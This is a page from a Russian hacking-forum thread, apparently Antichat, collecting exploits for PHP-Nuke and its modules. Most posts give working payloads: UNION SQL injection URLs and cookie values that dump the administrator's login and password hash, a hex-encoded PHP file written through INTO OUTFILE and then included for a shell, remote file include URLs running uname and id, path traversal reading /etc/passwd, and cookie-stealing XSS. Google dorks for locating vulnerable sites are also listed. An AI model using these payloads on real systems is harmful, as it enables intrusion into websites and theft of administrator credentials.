Форум АНТИЧАТ
Страница 4 из 5 < 1 2 3 4 5 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (http://forum.antichat.ru/index.php)
-   Сценарии/CMF/СMS (http://forum.antichat.ru/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей PHP-Nuke ] (http://forum.antichat.ru/showthread.php?t=59150)

login999 03.09.2008 00:32
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability
 
Код:

##################################################  ##########

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,n  ull,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

##################################################  ##########

# milw0rm.com [2008-09-02]


Содрано с milw0rm.com/exploits/6347

bons 06.09.2008 22:30
изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0

Код:

modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authors


и еще

Код:

modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,1  4,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_auth  ors--
modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=-1+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,pwd,14  ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3  1,aid,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47  ,48,49+from+nuke_authors--

l-l00K 04.12.2008 22:22
SQL-Injection PHP-Nuke <= 8.0
 
SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)

/modules/Reviews/index.php
Фрагмент уязвимого кода:
PHP код:
 $uname filter($cookie[1], "nohtml");
    $id intval($id);
    $score intval($score);
    if (is_user($user)) {
        $krow $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
        if ($krow['karma'] == 2) {
            $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
            include("header.php");
            title(""._MODERATEDTITLE."");
            OpenTable();
            echo "<center>"._COMMENTMODERATED."";
            echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
            CloseTable();
            include("footer.php");
            die();
        } elseif ($krow['karma'] == 3) {
            Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
            die();
        }
    }
    $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')"); 

Тут присутствуют сразу 2 sql-inj, в select и в insert запросах, после раскадировки кук, происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter
PHP код:
 function filter($what$strip=""$save=""$type="") {
    if ($strip == "nohtml") {
        $what check_html($what$strip);
//        $what = htmlentities(trim($what), ENT_QUOTES);
        // If the variable $what doesn't comes from a preview screen should be converted
        if ($type != "preview" AND $save != 1) {
            $what html_entity_decode($whatENT_QUOTES);
        }
    }
    if ($save == 1) {
        $what check_words($what);
        $what check_html($what$strip);
        if (!get_magic_quotes_gpc()) {
        $what addslashes($what);
}
    } else {
        $what stripslashes(FixQuotes($what,$strip));
        $what check_words($what);
        $what check_html($what$strip);
    }
    return($what);


а оттуда в ф-цию check_html
PHP код:
 function check_html ($str$strip="") {
    /* The core of this code has been lifted from phpslash */
    /* which is licenced under the GPL. */
    include("config.php");
    if ($strip == "nohtml")
    $AllowableHTML=array('');
    $str stripslashes($str);
    $str eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>'$str);
    // Delete all spaces from html tags .
    $str eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">'$str);
    // Delete all attribs from Anchor, except an href, double quoted.
    $str eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>"''$str);
    // Delete all img tags
    $str eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>"''$str);
    // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
    $tmp "";
    while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
        $i strpos($str,$reg[0]);
        $l strlen($reg[0]);
        if ($reg[1][0] == "/"$tag strtolower(substr($reg[1],1));
        else $tag strtolower($reg[1]);
        if ($a $AllowableHTML[$tag])
        if ($reg[1][0] == "/"$tag "</$tag>";
        elseif (($a == 1) || ($reg[2] == "")) $tag "<$tag>";
        else {
            # Place here the double quote fix function.
            $attrb_list=delQuotes($reg[2]);
            // A VER
            //$attrb_list = ereg_replace("&","&amp;",$attrb_list);
            $tag "<$tag" $attrb_list ">";
        } # Attribs in tag allowed
        else $tag "";
        $tmp .= substr($str,0,$i) . $tag;
        $str substr($str,$i+$l);
    }
    $str $tmp $str;
    return $str;
    exit;
    /* Squash PHP tags unconditionally */
    $str ereg_replace("<\?","",$str);
    return $str;

где экранирующие бэкслэши успешно удаляются, поэтому становится возможным внедрить наш sql код, через скулю в select данные вывести не получится, поэтому юзаем скулю в insert
Идем в
/modules.php?name=Reviews&rop=showcontent&id=1
выбираем любую рецензию, жмем "Поместить комментарий"
в куки кидаем
Код:
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)

Жмем submit, в результате мы получим login:hash админа

Зато через скулю в select при file_priv можно залить шелл, кидаем в куки:
Код:
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)

Тут путь можно не раскрывать, лить в tmp, а затем просто проинклудить залитый шелл через templetes, для этого идем в /modules.php?name=Your_Account&op=chgtheme
правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем:
Код:
<option value="/../../../../../../../tmp/" >RusNuke2003

сохраняем, получаем шелл

l-l00K 14.12.2008 16:02
Уязвимости модулей PHP-NUKE
 
Уязвимый продукт: PHP-NUKE module Pages
Версия: 1.0
Дорк: Pages © inurl:/modules.php?name=Pages

SQL-injections

Уязвимость в файле: index.php

В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры

Код:
/modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23
/modules.php?name=Pages&pa=showpage&pid=11'%0aunion+select+1,2,aid,pwd,5,6,7,8,9,0,11,  12+from+nuke_authors%23
/modules.php?name=Pages&pa=list_pages_categories&cid=11'%0aunion+select+1,aid,pwd,4+from+nuke_autho  rs%23
/modules.php?name=Pages&cid=11'%0aunion+select+1%23
/modules.php?name=Pages&pid=11'%0aunion+select%201,2%23

l-l00K 15.12.2008 01:39
Уязвимый продукт: PHP-NUKE module video stream
Версия: 4.53
Дорк: inurl:name=Video_Stream

SQL-injections


Уязвимость в файле: watch.php
PHP код:
 $id $_GET['id'];
$request $_GET['request'];

if($id == "request") {
    // Gets the data of request video **FOR ADMIN**
    $result $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'");
    $row $db->sql_fetchrow($result);
} else {
    // Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered
    adultcategory($id);
    // Add user point for veiwing video
    userpointsVS(1);
    // adds a view to the video
    $result $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
    $row $db->sql_fetchrow($result);
    $v $row['views'];
    $v++;
    $result $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'");
    // Gets the data of that video
    $result $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
    $row $db->sql_fetchrow($result);    


Как видим здесь присутствуют сразу несколько sql-inj
Примеры запросов:
Код:
/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,1  3,14,15,16%23
/modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11  ,12,13,14,15,16%23


Уязвимость в файле: broken.php
PHP код:
 if($_POST['Submit']) {
        OpenTable();
        $usernameb $_POST['username'];
        $user_emailb $_POST['user_email'];
        $result $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') "); 

Пример запроса:
Код:
POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=broken&id=1&vidname=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1)  ,1)/*&user_email=ad%40a.ru&Submit=Submit


Уязвимость в файле: search.php
В этом модуле присуствуют сразу несколько sql-inj

Примеры запросов:
1. /phpnuke/modules.php?name=Video_Stream&page=search
в поле search:
Код:
44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*

2.
Код:
POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort


Уязвимость в файле: comment.php
PHP код:
 $commenttopost $_POST['comment'];
                // Check if no comment
                if($commenttopost == "") {
                    die(""._NOCOMMENTENT."");
                }
                $date date("h:i A dS M Y");
    
                $username $looker;
    
                // Strips out HTML and Censored Words
                filter_text($commenttopost'nohtml');
                // **********************************
                userpointsVS(2);
                $result $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') "); 

в куки кидаем:
Код:
id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*

В результате получим комментарий содержащий aid:hash администратора

l-l00K 16.12.2008 19:43
Уязвимый продукт: PHP-NUKE module auktion
Версия: 2.0
Дорк: inurl:modules.php?name=auktion

SQL-injections

В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах

Примеры запросов:
Код:
/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13  ,14,15,16,17,18,19,20,21
/modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23
/modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/*
/modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  ,15,16,17,18,19,20,21%23

Код:
POST /modules.php?name=auktion&file=edititem HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3
Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEz  MzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1Y  TMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D; 
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*

l-l00K 19.12.2008 02:44
Уязвимый продукт: PHP-NUKE module NukeJokes
Версия: 2.2
Дорк: inurl:modules.php?name=NukeJokes

SQL-injections

Уязвимость в файле: index.php
PHP код:
 function CatView($cat$page){
...
   $result sql_query("SELECT jokecid, catname FROM ".$prefix."_jokes_categories WHERE jokecid='$cat'"$dbi); 

Данные из параметра cat попадают в запрос без каких либо преобразований
Пример запроса:
Код:
/modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23

PHP код:
 function JokeView($jokeid){
...
   $result sql_query("SELECT author, name, date, cat, joke, hits, ratingtot, ratings FROM ".$prefix."_jokes WHERE jokeid='$jokeid'"$dbi); 

Данные из параметра jokeid попадают в запрос без каких либо преобразований
Пример запроса:
Код:
/modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23

Уязвимость в файле: send.php
PHP код:
 function send($jokeid$sendername$senderemail$toname$toemail){
    global $sitename$nukeurl$prefix$dbi$module_name$stop;
    include("header.php");
    include("config.php");
    checkemail($toemail);
    if (!$stop) {
    $result sql_query("SELECT name from ".$prefix."_jokes where jokeid='$jokeid'"$dbi);
    list($name) = sql_fetch_row($result$dbi);
    $subject ""._SUBJECT." $sitename";
    $message ""._HELLO." $toname:\n\n"._YOURFRIEND." $sendername "._CONSIDERED."\n\n\n$name\n\n"._URL.": $nukeurl/modules.php?name=$module_name&func=JokeView&jokeid=$jokeid\n\n"._YOUCANREAD." $sitename\n$nukeurl";
    $toemail str_replace(" ","",$toemail);
       mail($toemail$subject$message"From: \"$sendername\" <$senderemail>\nX-Mailer: PHP/" phpversion()); 

Уязвимость в параметре jokeid, т.к данные из столбца name отправляются на email, при таком запросе:
Код:
POST /modules.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/modules.php?name=NukeJokes&file=send&jokeid=1608
Cookie: TRACKID=7b45bd0b2a560da542a5eb4fc22512c6; lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
name=NukeJokes&file=send&func=send&jokeid=-1'/**/union select concat(aid,0x3a,pwd) from nuke_authors limit 0,1/*&sendername=aaa&senderemail=aaa%40mail.ru&toname=bbb&toemail=aaa%40mail.ru

Мы получим aid:hash администратора на указаное нами мыло

Уязвимость в файле: search.php
PHP код:
 function search($q$cat){
 global $module_name$prefix$bgcolor1$bgcolor2$dbi$prefix;
include("header.php");
if($cat==0){
$cats " ";
}else{
$cats " cat=".$cat." AND ";
}

ModuleSearch();
...
  $search sql_query("SELECT jokeid, author, date, name, cat, hits, ratings FROM ".$prefix."_jokes WHERE".$cats."(name LIKE '%$q%' OR joke LIKE '%$q%')"$dbi); 

Уязвимость в параметрах cat и q
Пример запроса:
Код:
/modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23

Уязвимость в файле: comments.php
PHP код:
 function JokesAddCom($jokeid$author$comment){
   global $prefix$dbi$bgcolor1$module_name$bgcolor2;
    $author FixQuotes(nl2br(filter_text($author)));
    $comment FixQuotes(nl2br(filter_text($comment)));
   sql_query("INSERT into ".$prefix."_jokes_comments VALUES(NULL, '$author' ,'$comment' , '$jokeid')"$dbi); 

в ф-ции, filter_text удаляются хтмл тэги, затем данные попадают в ф-цию FixQuotes
PHP код:
 function FixQuotes ($what "") {
    while (stristr($what"\\\\'")) {
        $what str_replace("\\\\'","'",$what);
    }
    return $what;


Для чего здесь была использована эта ф-ция непонятно, при magic_quotes_gpc=off мы без труда можем внедрить наш sql код, для этого
выбираем любую шутку, жмем добавить комментарий, в куки кидаем:
Код:
author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/*

в результате получим aid:hash админа

baltazar 03.01.2009 23:06
В модулях:

Код:
http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
http://www.strona.pl/modules.php?name=Search&file=../../../../../../ ../../../etc/passwd%008



Код:
http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd



Код:
http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjox



Код:
http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk   e_authors%20--


Код:

http://site/modules.php?name=Reviews&rop=savecomment&id=1&amp; amp;uname=f00bar&score=999999999999999999999999



Код:
http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20F  ROM%2 0nuke_authors%20--



Код:
http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*



В галерии:


Код:
http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd

Код:


http://site/modules/4nAlbum/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd



Код:
http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwd


Код:
http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd



Код:
http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwd



Код:
http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd



Код:
http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd



Код:
http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id

baltazar 03.01.2009 23:09
Инклуды:

Код:

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=shell?

[underwater] 23.07.2009 00:00
XSS

Версии:
Код:
PHP-Nuke 7.3
 PHP-Nuke 7.2
 PHP-Nuke 7.1
 PHP-Nuke 7.0 FINAL
 PHP-Nuke 7.0
 PHP-Nuke 6.9
 PHP-Nuke 6.7
 PHP-Nuke 6.6
 PHP-Nuke 6.5 RC3
 PHP-Nuke 6.5 RC2
 PHP-Nuke 6.5 RC1
 PHP-Nuke 6.5 FINAL
 PHP-Nuke 6.5 BETA 1
 PHP-Nuke 6.5
 PHP-Nuke 6.0



Код:
http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here]
http://www.example.com/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss
code here]
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=[xss
code here]&month=05&month_l=May
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss
code here]&month_l=May
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss
code here]
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss
code here]&order=0&thold=0
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.example.com/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>


Московское время: 00:09.
Страница 4 из 5 < 1 2 3 4 5 >
Показывать 40 сообщений этой темы на одной странице

Powered by: vBulletin Version 3.0.x
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.